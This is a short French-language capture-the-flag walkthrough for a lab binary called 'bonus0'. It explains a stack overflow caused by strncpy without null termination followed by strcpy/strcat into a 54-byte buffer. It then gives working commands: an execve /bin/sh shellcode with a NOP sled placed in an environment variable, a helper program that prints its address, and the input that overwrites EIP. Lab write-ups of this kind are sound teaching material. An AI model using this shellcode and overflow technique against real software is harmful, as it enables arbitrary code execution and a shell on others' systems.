# Walkthrough — bonus0

## 1) Contexte & objectifs
- Objectif : provoquer un overflow sur la stack pour exécuter un shellcode via une variable d’environnement.
- Fichier / binaire : `bonus0`.
- Contexte : deux entrées de 20 caractères sont concaténées puis copiées dans un buffer trop petit.

## 2) Analyse & vulnérabilité
- Analyse statique :
	- `p` fait `strncpy(..., 0x14)` sans ajouter de `\0` si l’entrée fait 20 caractères.
	- `pp` copie deux buffers de 20 octets collés, puis fait `strcpy` et `strcat`.
	- Taille copiée : `20 + 20 + 1 + 20 = 61` octets.
	- Buffer cible : `char local_3a[54]` dans `main`.
- Analyse dynamique :
	- EIP est écrasé à l’offset 10 du deuxième input.
- Vulnérabilité : overflow du buffer de `main`.

## 3) Exploitation & flag
- Étapes :
	- Placer un shellcode dans une variable d’environnement (NOP sled `\x90` + shellcode).
	- Récupérer son adresse via un petit programme.
	- Envoyer deux inputs de 20 chars, le second écrasant l’EIP avec l’adresse du shellcode.
- Commandes utilisées :
	- `export SHELLCODE=$(python -c 'print "\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')`
	- `echo 'int main() { printf("0x%x\n", getenv("SHELLCODE")); }' > /tmp/find.c && gcc /tmp/find.c -o /tmp/find && /tmp/find`
	- `(python -c 'print "A"*20'; python -c 'print "B"*10 + "\x42\xff\xff\xbf" + "C"*6'; cat) | ./bonus0`